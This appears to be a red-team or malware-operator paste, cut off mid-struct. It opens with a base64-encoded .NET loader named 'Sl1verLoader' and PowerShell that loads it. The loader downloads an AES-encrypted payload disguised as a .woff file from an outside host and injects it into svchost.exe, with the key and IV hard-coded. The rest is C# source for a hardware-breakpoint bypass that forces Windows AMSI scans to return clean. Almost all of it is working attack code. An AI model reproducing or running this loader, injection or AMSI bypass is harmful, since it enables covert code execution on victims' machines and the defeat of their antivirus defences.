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fRU5EAENSRUFURV9ERUZBVUxUX0VSUk9SX01PREUAQ1JFQVRFX05FV19DT05TT0xFAFBBR0VfRVhFQ1VURV9SRUFEV1JJVEUAUFJPRklMRV9LRVJORUwAQ1JFQVRFX1BSRVNFUlZFX0NPREVfQVVUSFpfTEVWRUwAQ1JFQVRFX1NIQVJFRF9XT1dfVkRNAENSRUFURV9TRVBBUkFURV9XT1dfVkRNAFBST0NFU1NfTU9ERV9CQUNLR1JPVU5EX0JFR0lOAFN5c3RlbS5JTwBDUkVBVEVfTkVXX1BST0NFU1NfR1JPVVAAUFJPRklMRV9VU0VSAFBST0ZJTEVfU0VSVkVSAENSRUFURV9GT1JDRURPUwBJRExFX1BSSU9SSVRZX0NMQVNTAFJFQUxUSU1FX1BSSU9SSVRZX0NMQVNTAEhJR0hfUFJJT1JJVFlfQ0xBU1MAQUJPVkVfTk9STUFMX1BSSU9SSVRZX0NMQVNTAEJFTE9XX05PUk1BTF9QUklPUklUWV9DTEFTUwBERVRBQ0hFRF9QUk9DRVNTAENSRUFURV9QUk9URUNURURfUFJPQ0VTUwBERUJVR19QUk9DRVNTAERFQlVHX09OTFlfVEhJU19QUk9DRVNTAE1FTV9DT01NSVQAQ1JFQVRFX0lHTk9SRV9TWVNURU1fREVGQVVMVABDUkVBVEVfVU5JQ09ERV9FTlZJUk9OTUVOVABFWFRFTkRFRF9TVEFSVFVQSU5GT19QUkVTRU5UAEFFU0lWAGdldF9JVgBzZXRfSVYAQ1JFQVRFX05PX1dJTkRPVwBkd1gASU5IRVJJVF9QQVJFTlRfQUZGSU5JVFkASU5IRVJJVF9DQUxMRVJfUFJJT1JJVFkAZHdZAHZhbHVlX18ARG93bmxvYWREYXRhAGRhdGEAY2IAbXNjb3JsaWIAPD5jAFN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljAGxwVGhyZWFkSWQAZHdUaHJlYWRJZABkd1Byb2Nlc3NJZABDcmVhdGVSZW1vdGVUaHJlYWQAaFRocmVhZABBZGQAbHBSZXNlcnZlZABQYWRkaW5nTW9kZQBDcnlwdG9TdHJlYW1Nb2RlAENvbXByZXNzaW9uTW9kZQBJRGlzcG9zYWJsZQBiSW5oZXJpdEhhbmRsZQBscFRpdGxlAGxwQXBwbGljYXRpb25OYW1lAGxwQ29tbWFuZExpbmUAQ29tYmluZQBWYWx1ZVR5cGUAZmxBbGxvY2F0aW9uVHlwZQBEaXNwb3NlAFg1MDlDZXJ0aWZpY2F0ZQBjZXJ0aWZpY2F0ZQBDcmVhdGUARGVsZWdhdGUAV3JpdGUAQ29tcGlsZXJHZW5lcmF0ZWRBdHRyaWJ1dGUAR3VpZEF0dHJpYnV0ZQBEZWJ1Z2dhYmxlQXR0cmlidXRlAENvbVZpc2libGVBdHRyaWJ1dGUAQXNzZW1ibHlUaXRsZUF0dHJpYnV0ZQBBc3NlbWJseVRyYWRlbWFya0F0dHJpYnV0ZQBUYXJnZXRGcmFtZXdvcmtBdHRyaWJ1dGUAZHdGaWxsQXR0cmlidXRlAEFzc2VtYmx5RmlsZVZlcnNpb25BdHRyaWJ1dGUAQXNzZW1ibHlDb25maWd1cmF0aW9uQXR0cmlidXRlAEFzc2VtYmx5RGVzY3JpcHRpb25BdHRyaWJ1dGUARmxhZ3NBdHRyaWJ1dGUAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQBBc3NlbWJseVByb2R1Y3RBdHRyaWJ1dGUAQXNzZW1ibHlDb3B5cmlnaHRBdHRyaWJ1dGUAQXNzZW1ibHlDb21wYW55QXR0cmlidXRlAFJ1bnRpbWVDb21wYXRpYmlsaXR5QXR0cmlidXRlAERvd25sb2FkQW5kRXhlY3V0ZQBkd1hTaXplAGR3WVNpemUAZHdTdGFja1NpemUAZHdTaXplAFNpemVPZgBzZXRfUGFkZGluZwBTeXN0ZW0uUnVudGltZS5WZXJzaW9uaW5nAFN0cmluZwBMZW5ndGgAVXJpAFJlbW90ZUNlcnRpZmljYXRlVmFsaWRhdGlvbkNhbGxiYWNrAGdldF9TZXJ2ZXJDZXJ0aWZpY2F0ZVZhbGlkYXRpb25DYWxsYmFjawBzZXRfU2VydmVyQ2VydGlmaWNhdGVWYWxpZGF0aW9uQ2FsbGJhY2sATWFyc2hhbABDbGFzc0xpYnJhcnkxLmRsbABrZXJuZWwzMi5kbGwAdXJsAERlZmxhdGVTdHJlYW0AQ3J5cHRvU3RyZWFtAEdaaXBTdHJlYW0ATWVtb3J5U3RyZWFtAFByb2dyYW0AU3lzdGVtAFN5bW1ldHJpY0FsZ29yaXRobQBDb21wcmVzc2lvbkFsZ29yaXRobQBJQ3J5cHRvVHJhbnNmb3JtAEVudW0AbHBOdW1iZXJPZkJ5dGVzV3JpdHRlbgBYNTA5Q2hhaW4AY2hhaW4AU3lzdGVtLklPLkNvbXByZXNzaW9uAGxwUHJvY2Vzc0luZm9ybWF0aW9uAFN5c3RlbS5SZWZsZWN0aW9uAENvcHlUbwBscFN0YXJ0dXBJbmZvAFplcm8AbHBEZXNrdG9wAFNsMXZlckxvYWRlcgBzZW5kZXIAYnVmZmVyAFNlcnZpY2VQb2ludE1hbmFnZXIAbHBQYXJhbWV0ZXIAaFN0ZEVycm9yAC5jdG9yAC5jY3RvcgBscFNlY3VyaXR5RGVzY3JpcHRvcgBDcmVhdGVEZWNyeXB0b3IASW50UHRyAFN5c3RlbS5EaWFnbm9zdGljcwBBZXMAU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzAFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMARGVidWdnaW5nTW9kZXMAYkluaGVyaXRIYW5kbGVzAFN5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuWDUwOUNlcnRpZmljYXRlcwBscFRocmVhZEF0dHJpYnV0ZXMAbHBQcm9jZXNzQXR0cmlidXRlcwBTZWN1cml0eUF0dHJpYnV0ZXMAZHdDcmVhdGlvbkZsYWdzAENyZWF0ZVByb2Nlc3NGbGFncwBkd0ZsYWdzAGR3WENvdW50Q2hhcnMAZHdZQ291bnRDaGFycwBTc2xQb2xpY3lFcnJvcnMAc3NsUG9saWN5RXJyb3JzAGhQcm9jZXNzAGxwQmFzZUFkZHJlc3MAbHBBZGRyZXNzAGxwU3RhcnRBZGRyZXNzAGFkZHJlc3MARGVjb21wcmVzcwBDb25jYXQAT2JqZWN0AGZsUHJvdGVjdABTeXN0ZW0uTmV0AFdlYkNsaWVudABscEVudmlyb25tZW50AERlY3J5cHQAR2V0V2ViUmVxdWVzdABzZXRfVGltZW91dABXZWJDbGllbnRXaXRoVGltZW91dABoU3RkSW5wdXQAaFN0ZE91dHB1dABjaXBoZXJ0ZXh0AHdTaG93V2luZG93AFZpcnR1YWxBbGxvY0V4AFRvQXJyYXkAQUVTS2V5AGdldF9LZXkAc2V0X0tleQBTeXN0ZW0uU2V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"
$decodeStr = [System.Convert]::FromBase64String($encodeStr)
[System.Reflection.Assembly]::Load($decodeStr)
$url = "https://10.8.0.154:8447/test.woff"
$TargetBinary = "svchost.exe"
[byte[]]$AESKey = 0x44,0x28,0x47,0x2b,0x4b,0x62,0x50,0x65,0x53,0x68,0x56,0x6d,0x59,0x71,0x33,0x74,0x36,0x76,0x39,0x79,0x24,0x42,0x26,0x45,0x29,0x48,0x40,0x4d,0x63,0x51,0x66,0x54
[byte[]]$AESIV = 0x38,0x79,0x2f,0x42,0x3f,0x45,0x28,0x47,0x2b,0x4b,0x62,0x50,0x65,0x53,0x68,0x56
$CompressionAlgorithm = "deflate9"
[Sl1verLoader.Program]::DownloadAndExecute($url,$TargetBinary,$CompressionAlgorithm,$AESKey,$AESIV)
amsi64.txt
vim amsi64.txt
$HWBP = @"
using System;
using System.Collections.Generic;
using System.Linq.Expressions;
using System.Linq;
using System.Runtime.CompilerServices;
using System.Net;
using System.Reflection;
using System.Runtime.InteropServices;
namespace HWBP
{
public class Amsi
{
static string a = "msi";
static string b = "anB";
static string c = "ff";
static IntPtr BaseAddress = WinAPI.LoadLibrary("a" + a + ".dll");
static IntPtr pABuF = WinAPI.GetProcAddress(BaseAddress, "A" + a + "Sc" + b + "u" + c + "er");
static IntPtr pCtx = Marshal.AllocHGlobal(Marshal.SizeOf(typeof(WinAPI.CONTEXT64)));
public static void Bypass()
{
WinAPI.CONTEXT64 ctx = new WinAPI.CONTEXT64();
ctx.ContextFlags = WinAPI.CONTEXT64_FLAGS.CONTEXT64_ALL;
MethodInfo method = typeof(Amsi).GetMethod("Handler", BindingFlags.Static | BindingFlags.Public);
IntPtr hExHandler = WinAPI.AddVectoredExceptionHandler(1, method.MethodHandle.GetFunctionPointer());
Marshal.StructureToPtr(ctx, pCtx, true);
bool b = WinAPI.GetThreadContext((IntPtr)(-2), pCtx);
ctx = (WinAPI.CONTEXT64)Marshal.PtrToStructure(pCtx, typeof(WinAPI.CONTEXT64));
EnableBreakpoint(ctx, pABuF, 0);
WinAPI.SetThreadContext((IntPtr)(-2), pCtx);
}
public static long Handler(IntPtr exceptions)
{
WinAPI.EXCEPTION_POINTERS ep = new WinAPI.EXCEPTION_POINTERS();
ep = (WinAPI.EXCEPTION_POINTERS)Marshal.PtrToStructure(exceptions, typeof(WinAPI.EXCEPTION_POINTERS));
WinAPI.EXCEPTION_RECORD ExceptionRecord = new WinAPI.EXCEPTION_RECORD();
ExceptionRecord = (WinAPI.EXCEPTION_RECORD)Marshal.PtrToStructure(ep.pExceptionRecord, typeof(WinAPI.EXCEPTION_RECORD));
WinAPI.CONTEXT64 ContextRecord = new WinAPI.CONTEXT64();
ContextRecord = (WinAPI.CONTEXT64)Marshal.PtrToStructure(ep.pContextRecord, typeof(WinAPI.CONTEXT64));
if (ExceptionRecord.ExceptionCode == WinAPI.EXCEPTION_SINGLE_STEP && ExceptionRecord.ExceptionAddress == pABuF)
{
ulong ReturnAddress = (ulong)Marshal.ReadInt64((IntPtr)ContextRecord.Rsp);
IntPtr ScanResult = Marshal.ReadIntPtr((IntPtr)(ContextRecord.Rsp + (6 * 8))); // 5th arg, swap it to clean
Marshal.WriteInt32(ScanResult, 0, WinAPI.AMSI_RESULT_CLEAN);
ContextRecord.Rip = ReturnAddress;
ContextRecord.Rsp += 8;
ContextRecord.Rax = 0; // S_OK
Marshal.StructureToPtr(ContextRecord, ep.pContextRecord, true); //Paste our altered ctx back in TO THE RIGHT STRUCT
return WinAPI.EXCEPTION_CONTINUE_EXECUTION;
}
else
{
return WinAPI.EXCEPTION_CONTINUE_SEARCH;
}
}
public static void EnableBreakpoint(WinAPI.CONTEXT64 ctx, IntPtr address, int index)
{
switch (index)
{
case 0:
ctx.Dr0 = (ulong)address.ToInt64();
break;
case 1:
ctx.Dr1 = (ulong)address.ToInt64();
break;
case 2:
ctx.Dr2 = (ulong)address.ToInt64();
break;
case 3:
ctx.Dr3 = (ulong)address.ToInt64();
break;
}
ctx.Dr7 = SetBits(ctx.Dr7, 16, 16, 0);
ctx.Dr7 = SetBits(ctx.Dr7, (index * 2), 1, 1);
ctx.Dr6 = 0;
Marshal.StructureToPtr(ctx, pCtx, true);
}
public static ulong SetBits(ulong dw, int lowBit, int bits, ulong newValue)
{
ulong mask = (1UL << bits) - 1UL;
dw = (dw & ~(mask << lowBit)) | (newValue << lowBit);
return dw;
}
}
public class WinAPI
{
public const UInt32 DBG_CONTINUE = 0x00010002;
public const UInt32 DBG_EXCEPTION_NOT_HANDLED = 0x80010001;
public const Int32 EXCEPTION_CONTINUE_EXECUTION = -1;
public const Int32 EXCEPTION_CONTINUE_SEARCH = 0;
public const Int32 CREATE_PROCESS_DEBUG_EVENT = 3;
public const Int32 CREATE_THREAD_DEBUG_EVENT = 2;
public const Int32 EXCEPTION_DEBUG_EVENT = 1;
public const Int32 EXIT_PROCESS_DEBUG_EVENT = 5;
public const Int32 EXIT_THREAD_DEBUG_EVENT = 4;
public const Int32 LOAD_DLL_DEBUG_EVENT = 6;
public const Int32 OUTPUT_DEBUG_STRING_EVENT = 8;
public const Int32 RIP_EVENT = 9;
public const Int32 UNLOAD_DLL_DEBUG_EVENT = 7;
public const UInt32 EXCEPTION_ACCESS_VIOLATION = 0xC0000005;
public const UInt32 EXCEPTION_BREAKPOINT = 0x80000003;
public const UInt32 EXCEPTION_DATATYPE_MISALIGNMENT = 0x80000002;
public const UInt32 EXCEPTION_SINGLE_STEP = 0x80000004;
public const UInt32 EXCEPTION_ARRAY_BOUNDS_EXCEEDED = 0xC000008C;
public const UInt32 EXCEPTION_INT_DIVIDE_BY_ZERO = 0xC0000094;
public const UInt32 DBG_CONTROL_C = 0x40010006;
public const UInt32 DEBUG_PROCESS = 0x00000001;
public const UInt32 CREATE_SUSPENDED = 0x00000004;
public const UInt32 CREATE_NEW_CONSOLE = 0x00000010;
public const Int32 AMSI_RESULT_CLEAN = 0;
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool SetThreadContext(IntPtr hThread, IntPtr lpContext);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool GetThreadContext(IntPtr hThread, IntPtr lpContext);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32", SetLastError = true, CharSet = CharSet.Ansi)]
public static extern IntPtr LoadLibrary([MarshalAs(UnmanagedType.LPStr)] string lpFileName);
[DllImport("Kernel32.dll")]
public static extern IntPtr AddVectoredExceptionHandler(uint First, IntPtr Handler);
[Flags]
public enum CONTEXT64_FLAGS : uint
{
CONTEXT64_AMD64 = 0x100000,
CONTEXT64_CONTROL = CONTEXT64_AMD64 | 0x01,
CONTEXT64_INTEGER = CONTEXT64_AMD64 | 0x02,
CONTEXT64_SEGMENTS = CONTEXT64_AMD64 | 0x04,
CONTEXT64_FLOATING_POINT = CONTEXT64_AMD64 | 0x08,
CONTEXT64_DEBUG_REGISTERS = CONTEXT64_AMD64 | 0x10,
CONTEXT64_FULL = CONTEXT64_CONTROL | CONTEXT64_INTEGER | CONTEXT64_FLOATING_POINT,
CONTEXT64_ALL = CONTEXT64_CONTROL | CONTEXT64_INTEGER | CONTEXT64_SEGMENTS | CONTEXT64_FLOATING_POINT | CONTEXT64_DEBUG_REGISTERS
}
[StructLayout(LayoutKind.Sequential)]
public struct M128A
{
public ulong High;
public long Low;
public override string ToString()
{
return string.Format("High:{0}, Low:{1}", this.High, this.Low);
}
}
[StructLayout(LayoutKind.Sequential, Pack = 16)]
public struct XSAVE_FORMAT64
{
public ushort ControlWord;
public ushort StatusWord;
public byte TagWord;
public byte Reserved1;
public ushort ErrorOpcode;
public uint ErrorOffset;
public ushort ErrorSelector;
public ushort Reserved2;
public uint DataOffset;
public ushort DataSelector;
public ushort Reserved3;
public uint MxCsr;
public uint MxCsr_Mask;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 8)]
public M128A[] FloatRegisters;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)]
public M128A[] XmmRegisters;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 96)]
public byte[] Reserved4;
}
[StructLayout(LayoutKind.Sequential, Pack = 16)]
public struct CONTEXT64
{
public ulong P1Home;
public ulong P2Home;
public ulong P3Home;
public ulong P4Home;
public ulong P5Home;
public ulong P6Home;
public CONTEXT64_FLAGS ContextFlags;
public uint MxCsr;
public ushort SegCs;
public ushort SegDs;
public ushort SegEs;
public ushort SegFs;
public ushort SegGs;
public ushort SegSs;
public uint EFlags;
public ulong Dr0;
public ulong Dr1;
public ulong Dr2;
public ulong Dr3;
public ulong Dr6;
